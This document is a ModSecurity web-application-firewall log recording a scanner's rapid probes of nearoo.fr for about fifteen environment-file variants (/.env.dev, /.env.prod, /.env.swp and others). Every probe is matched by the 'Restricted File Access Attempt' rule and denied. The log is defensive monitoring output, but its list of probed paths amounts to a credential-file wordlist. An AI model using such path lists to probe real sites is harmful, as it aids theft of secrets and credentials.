[Mon May 11 17:35:48.246015 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.example"] [unique_id "agH3VPy_GXSWIKeli0sNOwAAAIE"]
[Mon May 11 17:35:48.409930 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.dev"] [unique_id "agH3VPy_GXSWIKeli0sNPAAAAIE"]
[Mon May 11 17:35:48.410182 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.dev"] [unique_id "agH3VPy_GXSWIKeli0sNPAAAAIE"]
[Mon May 11 17:35:48.410449 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.dev"] [unique_id "agH3VPy_GXSWIKeli0sNPAAAAIE"]
[Mon May 11 17:35:48.701728 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.prod"] [unique_id "agH3VPy_GXSWIKeli0sNPQAAAIE"]
[Mon May 11 17:35:48.701975 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.prod"] [unique_id "agH3VPy_GXSWIKeli0sNPQAAAIE"]
[Mon May 11 17:35:48.702230 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.prod"] [unique_id "agH3VPy_GXSWIKeli0sNPQAAAIE"]
[Mon May 11 17:35:48.940260 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.stage"] [unique_id "agH3VPy_GXSWIKeli0sNPgAAAIE"]
[Mon May 11 17:35:48.940491 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.stage"] [unique_id "agH3VPy_GXSWIKeli0sNPgAAAIE"]
[Mon May 11 17:35:48.940727 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.stage"] [unique_id "agH3VPy_GXSWIKeli0sNPgAAAIE"]
[Mon May 11 17:35:49.134361 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.ci"] [unique_id "agH3Vfy_GXSWIKeli0sNPwAAAIE"]
[Mon May 11 17:35:49.134592 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.ci"] [unique_id "agH3Vfy_GXSWIKeli0sNPwAAAIE"]
[Mon May 11 17:35:49.134831 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.ci"] [unique_id "agH3Vfy_GXSWIKeli0sNPwAAAIE"]
[Mon May 11 17:35:49.444263 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.docker"] [unique_id "agH3Vfy_GXSWIKeli0sNQQAAAIE"]
[Mon May 11 17:35:49.444501 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.docker"] [unique_id "agH3Vfy_GXSWIKeli0sNQQAAAIE"]
[Mon May 11 17:35:49.444744 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.docker"] [unique_id "agH3Vfy_GXSWIKeli0sNQQAAAIE"]
[Mon May 11 17:35:49.683289 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.live"] [unique_id "agH3Vfy_GXSWIKeli0sNQgAAAIE"]
[Mon May 11 17:35:49.683520 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.live"] [unique_id "agH3Vfy_GXSWIKeli0sNQgAAAIE"]
[Mon May 11 17:35:49.683780 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.live"] [unique_id "agH3Vfy_GXSWIKeli0sNQgAAAIE"]
[Mon May 11 17:35:49.908196 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.preprod"] [unique_id "agH3Vfy_GXSWIKeli0sNQwAAAIE"]
[Mon May 11 17:35:49.908517 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.preprod"] [unique_id "agH3Vfy_GXSWIKeli0sNQwAAAIE"]
[Mon May 11 17:35:49.908855 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.preprod"] [unique_id "agH3Vfy_GXSWIKeli0sNQwAAAIE"]
[Mon May 11 17:35:50.231745 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.uat"] [unique_id "agH3Vvy_GXSWIKeli0sNRAAAAIE"]
[Mon May 11 17:35:50.232079 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.uat"] [unique_id "agH3Vvy_GXSWIKeli0sNRAAAAIE"]
[Mon May 11 17:35:50.232381 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.uat"] [unique_id "agH3Vvy_GXSWIKeli0sNRAAAAIE"]
[Mon May 11 17:35:50.476335 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.dist"] [unique_id "agH3Vvy_GXSWIKeli0sNRQAAAIE"]
[Mon May 11 17:35:50.476560 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.dist"] [unique_id "agH3Vvy_GXSWIKeli0sNRQAAAIE"]
[Mon May 11 17:35:50.476809 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.dist"] [unique_id "agH3Vvy_GXSWIKeli0sNRQAAAIE"]
[Mon May 11 17:35:50.644372 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.swp"] [unique_id "agH3Vvy_GXSWIKeli0sNRgAAAIE"]
[Mon May 11 17:35:50.644604 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.swp"] [unique_id "agH3Vvy_GXSWIKeli0sNRgAAAIE"]
[Mon May 11 17:35:50.644855 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.swp"] [unique_id "agH3Vvy_GXSWIKeli0sNRgAAAIE"]
[Mon May 11 17:35:50.758720 2026] [security2:error] [pid 1411201:tid 1411258] [client 49.233.45.47:39152] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agH3Vvy_GXSWIKeli0sNRwAAAIw"], referer: http://castiglionecf.com
[Mon May 11 17:35:51.056740 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env~"] [unique_id "agH3V_y_GXSWIKeli0sNSAAAAIE"]
[Mon May 11 17:35:51.056983 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env~"] [unique_id "agH3V_y_GXSWIKeli0sNSAAAAIE"]
[Mon May 11 17:35:51.057236 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env~"] [unique_id "agH3V_y_GXSWIKeli0sNSAAAAIE"]
[Mon May 11 17:35:51.225515 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env1"] [unique_id "agH3V_y_GXSWIKeli0sNSQAAAIE"]
[Mon May 11 17:35:51.225749 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env1"] [unique_id "agH3V_y_GXSWIKeli0sNSQAAAIE"]
[Mon May 11 17:35:51.225995 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env1"] [unique_id "agH3V_y_GXSWIKeli0sNSQAAAIE"]
[Mon May 11 17:35:51.389008 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env2"] [unique_id "agH3V_y_GXSWIKeli0sNSgAAAIE"]
[Mon May 11 17:35:51.389253 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env2"] [unique_id "agH3V_y_GXSWIKeli0sNSgAAAIE"]
